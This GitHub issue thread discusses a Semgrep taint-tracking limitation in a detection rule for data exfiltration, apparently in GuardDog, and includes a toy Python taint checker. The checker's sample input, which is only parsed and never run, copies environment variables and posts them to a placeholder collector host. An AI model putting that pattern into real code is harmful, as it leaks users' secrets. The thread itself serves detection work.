Document limitations of taint tracking

Open enelli opened this issue 3 years ago • 1 comments

Deep Semgrep is needed to propagate values through function calls. An example of this is found in the exfiltrate-sensitive-data tests (ctx). It can also be seen here: https://semgrep.dev/s/enelli:exfiltrate-sensitive-data. The first case is not detected, but the second case that has only one function is caught.

enelli avatar Aug 08 '22 18:08 enelli
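
The difference between the two cases in the issue, as an added example (not code from GuardDog or Semgrep): a toy taint check over Python's `ast` that misses the flow split across two functions until per-function summaries are enabled. The source/sink pair, the sample code, and every function name here are assumptions made for the illustration, and the analysis is a simplified sketch, not Semgrep's algorithm.

```python
import ast

SOURCE, SINK = "os.environ", "requests.post"  # assumed source/sink pair for this sketch

# Constructed sample; it is only parsed, never executed. Names and URL are made up.
SAMPLE = '''
import os, requests

def send(payload):
    requests.post("https://collector.example.invalid", data=payload)

def split_across_functions():
    secrets = dict(os.environ)
    send(secrets)

def single_function():
    secrets = dict(os.environ)
    requests.post("https://collector.example.invalid", data=secrets)
'''

def is_tainted(expr, tainted):
    """True if expr mentions the source or a variable already marked tainted."""
    return any((isinstance(n, ast.Attribute) and ast.unparse(n) == SOURCE)
               or (isinstance(n, ast.Name) and n.id in tainted)
               for n in ast.walk(expr))

def reaches_sink(fn, tainted, summaries):
    """Scan fn's top-level statements in order; True if tainted data hits a sink."""
    tainted = set(tainted)
    for stmt in fn.body:
        if isinstance(stmt, ast.Assign) and is_tainted(stmt.value, tainted):
            tainted |= {t.id for t in stmt.targets if isinstance(t, ast.Name)}
        for call in (n for n in ast.walk(stmt) if isinstance(n, ast.Call)):
            name = ast.unparse(call.func)
            if name == SINK:
                args = call.args + [k.value for k in call.keywords]
            else:  # a callee counts as a sink only for parameters in its summary
                args = [a for i, a in enumerate(call.args) if i in summaries.get(name, ())]
            if any(is_tainted(a, tainted) for a in args):
                return True
    return False

def findings(code, interprocedural=False):
    """Names of functions flagged; summaries stay empty in intraprocedural mode."""
    funcs = [n for n in ast.walk(ast.parse(code)) if isinstance(n, ast.FunctionDef)]
    summaries = {}
    if interprocedural:  # one pass: which positional parameters flow to the sink?
        summaries = {fn.name: {i for i, p in enumerate(fn.args.args)
                               if reaches_sink(fn, {p.arg}, {})} for fn in funcs}
    return [fn.name for fn in funcs if reaches_sink(fn, set(), summaries)]
```

`findings(SAMPLE)` flags only `single_function`; `findings(SAMPLE, interprocedural=True)` also flags `split_across_functions`.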

Renaming/labeling as this is not a bug but a documented limitation of the free version of Semgrep.

christophetd avatar Nov 28 '22 09:11 christophetd

I don't think we should document this; this is a limitation of the tool being used and the way we craft our rules.

sobregosodd avatar Feb 13 '25 10:02 sobregosodd